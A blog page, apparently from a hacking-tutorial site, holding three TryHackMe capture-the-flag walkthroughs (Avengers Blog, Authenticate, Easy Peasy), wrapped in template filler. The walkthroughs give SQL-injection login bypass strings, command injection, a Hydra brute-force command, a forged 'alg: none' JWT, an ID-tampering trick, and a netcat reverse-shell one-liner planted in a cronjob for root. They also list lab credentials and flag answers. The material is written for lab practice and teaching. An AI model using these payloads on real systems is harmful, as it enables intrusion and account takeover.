STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Learn to hack into Tony Stark's machine! You will enumerate the machine, bypass a login portal via SQL injection and gain root access by command injection. TryHackMe Avengers Blog Walkthrough

[Task 2] Cookies

HTTP Cookies is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. They're intended to remember things such as your login information, items in your shopping cart or language you prefer.

Advertisers can use also tracking cookies to identify which sites you've previously visited or where about's on a web-page you've clicked. Some tracking cookies have become so intrusive, many anti-virus programs classify them as spyware.

You can view & dynamically update your cookies directly in your browser. To do this, press F12 (or right click and select Inspect) to open the developer tools on your browser, then click Application and then Cookies.

#1 On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

[Task 3] HTTP Headers

HTTP Headers let a client and server pass information with a HTTP request or response. Header names and values are separated by a single colon and are integral part of the HTTP protocol.

The main two HTTP Methods are POST and GET requests. The GET method us used to request data from a resource and the POST method is used to send data to a server.

We can view requests made to and from our browser by opening the Developer Tools again and navigating to the Network tab. Have this tab open and refresh the page to see all requests made. You will be able to see the original request made from your browser to the web server.

#1 Look at the HTTP response headers and obtain flag 2.

[Task 4] Enumeration and FTP

In your terminal, execute the following command:

nmap <machine_ip> -v

nmap -A -Pn -T4 -sC -sV --script vuln 10.10.5.55

This will scan the machine and determine what services on which ports are running. For this machine, you will see the following ports open:

Port 80 has a HTTP web server running on
Port 22 is to SSH into the machine
Port 21 is used for FTP (file transfer)

We've accessed the web server, lets now access the FTP service. If you read the Avengers web page, you will see that Rocket made a post asking for Groot's password to be reset, the post included his old password too!

In your terminal, execute the following command:

ftp <machine_ip>

We will be asked for a username (groot) and a password (iamgroot). We should have now successfully logged into the FTP share using Groots credentials!

ftp 10.10.5.55

username :- groot
password :- iamgroot

ftp> passive
ftp> ls
ftp> cd files
ftp> ls
ftp> get flag3.txt

#1 Look around the FTP share and read flag 3!

[Task 5] GoBuster

Lets use a fast directory discovery tool called GoBuster. This program will locate a directory that you can use to login to Mr. Starks Tarvis portal!

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

You can either download GoBuster, or use the Kali Linux machine that has it pre-installed.

Lets run GoBuster with a wordlist (on Kali they're located under /usr/share/wordlists):

gobuster dir -u http://<machine_ip> -w <word_list_location>

gobuster dir -u http://10.10.5.55 -w /usr/share/dirb/wordlists/common.txt

#1 What is the directory that has an Avengers login?

[Task 6] SQL Injection

You should now see the following page above. We're going to manually exploit this page using an attack called SQL injection.

SQL Injection is a code injection technique that manipulates an SQL query. You can execute you're own SQL that could destroy the database, reveal all database data (such as usernames and passwords) or trick the web server in authenticating you.

To exploit SQL, we first need to know how it works. A SQL query could be SELECT * FROM Users WHERE username = {User Input} AND password =
{User Input 2} , if you insert additional SQL as the {User Input} we can manipulate this query. For example, if I have the {User Input 2} as ' 1=1 we could trick the query into authenticating us as the ' character would break the SQL query and 1=1 would evaluate to be true.

To conclude, having our first {User Input} as the username of the account and {User Input 2} being the condition to make the query true, the final query would be:

SELECT * FROM Users WHERE username = `admin` AND password = `' 1=1`

This would authenticate us as the admin user.

#1 Log into the Avengers site. View the page source, how many lines of code are there?

username :- ' or 1=1 -- -
possword :- ' or 1=1 -- -

Right click > view page source > count no of code

[Task 7] Remote Code Execution and Linux

You should be logged into the Jarvis access panel! Here we can execute commands on the machine.. I wonder if we can exploit this to read files on the system.

Try executing the ls command to list all files in the current directory. Now try joining 2 Linux commands together to list files in the parent directory: cd ../; ls doing so will show a file called flag5.txt, we can add another command to read this file: cd ../; ls; cat flag5.txt

But oh-no! The cat command is disallowed! We will have to think of another Linux command we can use to read it!

#1 Read the contents of flag5.txt

cd ../; ls;

cd ../; ls; cat flag5.txt

but as you can see command disallowed

so, type the following command and hit enter :-

cd ../; ls; rev flag5.txt

but this flag is not correct, copy this flag and go to your linux terminal and type the following command and hit enter

echo "7fa8171a96976e1ab85563f31d2e533d" | rev

Video Tutorial :- soon otherwise search me on youtube kumar atul jaiswal

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

Learn how to attack authentication mechanisms used in web applications

A new room opened up recently on TryHackMe called Authenticate, so I thought I'd give it a shot and write this blog post whilst doing it. TryHackMe Authenticate Room Walkthrough

It looks to be a relatively simple "walkthrough" style room where they give you all the information you need in order to crack it.

I shall try to use different methods than the intended path as a test to show that for a lot of tasks there are many ways you can solve the challenges.

Scan a room IP

Tool :- Nmap*

nmap -A -Pn -sC -sV --script vuln 10.10.25.136

[Task 1] Deploy the VM

In today's time, the use of the authentication system is increasing because of the increase in the number of services that are coming up on the internet. But not everyone knows how to either make proper authentication software or how to properly set up one.

The aim of this room is to teach how to find authentication bugs and how you can exploit them.

[Task 2] Dictionary attack

The very obvious method of attacking any login form is just to brute force the credentials. But in this kind of brute force, we don't simply try numbers or simple alphabets. What we do is take an existing dictionary of commonly used username/passwords and use those to see if we can find the right combination. This is known as Dictionary Attack.

To perform a dictionary attack we can use a lot of tools like Hydra or Medusa but the issue with these CLI tools is that we need to provide a lot of arguments to them started and that could be confusing. That is why when trying a dictionary attack on a web application/form it's better to use Burp Suite. In Burp we can capture the login request and then use intruder to perform the attack.

If you are not familiar with burp suite then I would recommend that you first complete the Learn Burp Suite room.

Now let me show you an example using the Burp Suite:

1) Connect on port 8888

2) Now while the Capture is On in burp suite, enter any values you like in the username and password field.

3) Send this request to the intruder and for the position of the payload, we are just going to guess the password for the user jack. For payload, you can use any know default password list or maybe load a part of rockYou.

Note: Here I know that there exists a user named jack and that is why I am using that. In a real-life scenario, you might have to guess both the username and password.

4) Start the attack and wait for a bit. If you did everything correctly you'll notice that one of the requests sent by an intruder will have a bigger response then all of the others.

As you can see in the above screenshot that on the 5th request the length value is 530 and the length of the content in other requests is 480. This could mean that the burp was able to successfully login in Jack's account using the password 12345678.

#1 What is the flag you found after logging as Jack?

Ans :- fad9ddc1feebd9e9bca05f02dd89e271

Our Method

Tool :- Hydra

hydra -l mike -P /home/hackerboy/Documents/rockyou.txt "http-post-form://10.10.11.138:8888/login:user=^USER^&password=^PASS^:Invalid"

-l : For username

-p : For wordlist

http-post-form :- Nmap*

8888 : Nmap*

#2 Now try the same thing for username mike.

Ans :-

#3 What is the flag you found after logging as Mike?

Ans :-

[Task 3] Re-registration

In the previous task, we saw that it is possible to just simply guess/brute force the password with the help of a password dictionary. In this task, we are going to focus on a vulnerability that is unique in its own way.

A lot of times what happens is that developer forgets to sanitize the input(username & password) given by the user in the code of their application which can make them vulnerable to things like SQL injection but SQLi could be a bit difficult to exploit. So we are going to focus on a vulnerability that happens because of a developer's mistake but is very easy to exploit i.e re-registration of an existing user.

Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.

To see this in action go to port 8888 and try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.

#1 What is the flag that you found in darren's account?

Note :- Space with highlated mark

Ans :- fe86079416a21a3c99937fea8874b667

#2 Now try to do the same trick and see if you can login as arthur.

Ans :- No Answer Needed

#3 What is the flag that you found in arthur's account?

Ans :- please Try it yourself

[Task 4] JSON Web Token

JSON Web Token(JWT) is one of the commonly used methods for authorization. This is a kind of cookie that is generated using HMAC hashing or public/private keys. So unlike any other kind of cookie, it lets the website know what kind of access the currently logged in user has. The only special thing about JWT is that they are in JSON format(after decoding).

JWT can be divided into 3 parts separated by a dot(.)

1) Header: This consists of the algorithm used and the type of the token.

{ "alg": "HS256", "typ": "JWT"}

alg could be HMAC, RSA, SHA256 or can even contain None value.

2) Payload: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.

3) Signature: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)

Now to put all the 3 part together we base64 encode all of them separated by a dot(.) so it would look something like:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Note: This example was taken from jwt.io and you should check that website out if you want to learn more about JWT.

Exploitation

If used properly this is a very secure way of authorization but the problem is with using is "properly". A lot of developers misconfigure their system leaving it open to exploitation.

Now one of the methods to exploit this is to perform a brute force/dictionary attack and find the secret used for encrypting the JWT token and then used that to generate new tokens. But here we are not going to do that, we are going to see a very amazing way of exploiting this.

If you remember, in the Header section I said that the alg can be whatever the algorithm is used and also it can be None if no encryption is to be used. Now, this should not be used when the application is in production but again the problem of misconfiguration comes in and make the application vulnerable to this kind of attack. The attack is that an attacker can log in as low privilege user says guest and then get the JWT token for that user and then decode the token and edit the headers to use set alg value to None. This would mean that no encryption has to be used therefore the attacker wouldn't need to the secret used for encryption.

Practical

Let's see this method in practice. For this challenge visit the port 5000.

It is a very simple login page and in that, you can log in via two users: user and user2. Now first let's try to login with the credentials of user:user . To do so first enter those credentials then click on the Authenticate button and then enable the capture in burp suite and then click on the Go button. In the burp tab, you should see a request to /protected and there you'll see the JWT token.

Now take this JWT token and then you can decode it part by part.

So if we decode the first part, which will do: {"typ":"JWT","alg":"HS256"}

and decoding the 2nd part, we will get: {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":1}

If you try to decode the 3rd part then you'll get some gibberish. But that is okay we only need the first and the second part.

Now if we notice the identity value that is probably being used to identify the user but if you'll just edit that then it won't work because as I said the 3rd part is encrypted. So to bypass this we will make changes in the header as well as the value of the identity.

Encode the following string with base64 and that will be our first part

{"typ":"JWT","alg":"NONE"}

For the second part, we'll encode the following string:

{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2}

Notice how we changed the value of identity from 1 to 2.
Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:

eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

Now open the developer's tools in your browser and edit the stored cookie of the website to this new one and then just press the Go button and you'll notice that it will prompt "Welcome user2: guest2".

In a similar manner, you can try to play and find other users on the website.

This kind of misconfiguration in the authentication system is common and could be exploited to escalate privileges or steal information.

Our Method

#1 Use the same method to find identity of admin user and retrieve the flag?

1) First you open Burp

2) set proxy in your browser

3) Enable Intercept on burp suite and Login with user:user

4) Then, copy this :- eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

and replace with highlated mark and press forward button on burp suite

Ans :-

[Task 5] No Auth

In this I am going to show you how a lot of systems don't even have proper authentication and their system is just left open for anyone to exploit it.

A lot of time on websites we see that when we register a user and login with our credentials we are given a certain id which either is completely a number or ends with a number. Most of the time developers secures their application but sometime in some places, it could happen that just by changing that number we are able to see some hidden or private data.

To test this go to port 7777. On that just create an account. Once the account is created visit your Private Space.

As you can see in the image above the URL have /users/1. Try to change that value to 2 and we will get access to the admin account

The chance of finding this kind of vulnerability is very low but it could be a very serious bug if you get lucky and found something like this.

#1 Find the way to get into superadmin ad

Ans :- No Answer Needed

After Register and login Try With 0 :-

http://10.10.11.138:7777/users/0

#2 What is the password for superadmin account?

Ans :-

#3 What is the flag you found in superadmin account?

Ans :-

Video Tutorial :-

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

Easy Peasy

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. Easy Peasy TryHackMe walkthrough

[Task 1] Enumeration through Nmap

Deploy the machine attached to this task and use nmap to enumerate it.

#1 How many ports are open?

nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln

Ans :-

#2 What is the version of nginx?

Ans :-

#3 What is running on the highest port?

Ans :-

Notice we have 3 ports open:

· 80: nginx 1.16.1

· 6498: OpenSSH 7.6p1

· 65524: Apache httpd 2.4.43

[Task 2] Compromising the machine

Now you've enumerated the machine, answer questions and compromise it!

#1 Using GoBuster, find flag 1.

Now, the fun part begins!

The questions in this task require us to find hidden pages and files. Hence, we can start directory scan...

gobuster -e .php,.html,.txt dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt

OR

-e : For extension like .php .html .txt
dir : For Find a directory
-u : For URL
-w : For wordlists path

We see robots.txt and a directory named “hidden”. You can check them out, but there is only dead end. For further enumeration, let’s enumerate this “hidden” directory too.

gobuster -e .php,.html,.txt dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt

Yeah, /whatever. Let us check what’s inside its source code, shall we?

Nice! Our first flag with base64 encode. Let’s decode it with:

Ans :-

#2 Further enumerate the machine, what is flag 2?

Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.

gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt

Let’s check the “robots.txt” and notice a hash over there waiting to be cracked.

The thing is, we may know it is a md5, but cannot crack. I searched everywhere and found the only website to crack! This is the website:

https://md5hashing.net/hash

Just select “Search by all hash types” and have your 2nd Flag!

Ans :- flag{1m_s3c0nd_fl4g}

#3 Locate flag 3.

http://10.10.176.180:65524

We may think this is the default page but keep scrolling down to see your 3rd Flag without any encryption!

Ans :-

#4 What is the hidden directory?

We are not over with this page so let’s view-source:http://10.10.137.230:65524/

Notice the hidden tag on line 194. It’s a bit tricky, because it is NOT base64 and online tools won’t help at all. So I tried every decoder on http://icyberchef.com/ OR https://www.better-converter.com/Encoders-Decoders/Base62-Encode and finally cracked the hash. The output indicated that it was indeed another hidden directory.

Ans :-

#5 Using the file found in the hidden directory, find and crack a password hidden in the file.

We may now enter the hidden directory on port 65524:

We notice there is a hash and a picture waiting for us to investigate.

First, let us crack the hash with https://md5hashing.net/hash again:

Ans :-

#6 What is the password to login to the machine via SSH?

It was a hidden password after all we will use just a bit later. (Or now.)

Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…

Use steghide to extract secrets out of this image and enter the password we just cracked.

You can install it by:

apt install steghide

steghide extract -sf binarycodepixabay.jpg

Something will be extracted up as a secret text. Inside the text, we notice there is a username (boring) and a password as SSH login, but the password is all binary.

I used this site to convert the binary to text:

https://www.rapidtables.com/convert/number/binary-to-ascii.html

Ans :-

#7 What is the user flag?

Finally, it is time to ssh into this machine and check what’s going on:

ssh -p 6498 boring10.10.137.230Finally, it is time to ssh into this machine and check what’s going on:

P.S. Don’t forget the flag -p 6498 because this machine’s ssh port is not 22, but 6498!

ssh -p 6498 boring@10.10.175.149 -p 6498

ls -la to see the user.txt waiting for us to be opened.

cat user.txt

I searched “rotated online decode” on Google and found this site to decode this:

https://rot13.com/

Ans :-

#8 What is the root flag?

To solve the last question, I needed to get a root access. Thanks to the sentence in the description: “Then escalate your privileges through a vulnerable cronjob.” I found the vulnerable cronjob who locates in the /var/www directory. It was a hidden sh file who could be edited and executed. I’ve inserted the following code into the file to get a reverse shell.

rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip><port> >/tmp/f

At the same time, I also started a netcat listener to get my root shell. And after a minute I got it. I used the whoami command to check if I really was root. And yes I was. The root.txt was also a hidden file, so I used the ls -la command to list the hidden files and lastly used the cat command to read it.

This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.

Ans :-

Video Tutorial :-

Part - 1

Part - 2

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

WHAT WE DO

We've been developing corporate tailored services for clients for 30 years.

ABOUT US

OUR TEAM

Kumar Atul Jaiswal

Kumar Atul Jaiswal

Kumar Atul Jaiswal

OUR SKILLS

Marketing

Websites

PR

ACHIEVEMENTS

STRATEGY & CREATIVITY

PORTFOLIO

[Task 2] Cookies

[Task 3] HTTP Headers

[Task 4] Enumeration and FTP

[Task 5] GoBuster

[Task 6] SQL Injection

[Task 7] Remote Code Execution and Linux

Disclaimer

Learn how to attack authentication mechanisms used in web applications

Scan a room IP

[Task 1] Deploy the VM

[Task 2] Dictionary attack

Our Method

[Task 3] Re-registration

Exploitation﻿

Practical

Our Method

[Task 5] No Auth

Disclaimer

Easy Peasy

[Task 1] Enumeration through Nmap

[Task 2] Compromising the machine

Disclaimer

Ads

Youtube

Linkedln

Popular Posts

Like Us

Labels

Let's Talk About

Tweet

Connection

WHAT WE DO

ANALYTICS

CONSULTING

DESIGN

DEVELOPMENT

MARKETING

SEO

CONTACT US

Hacking Truth.in

Exploitation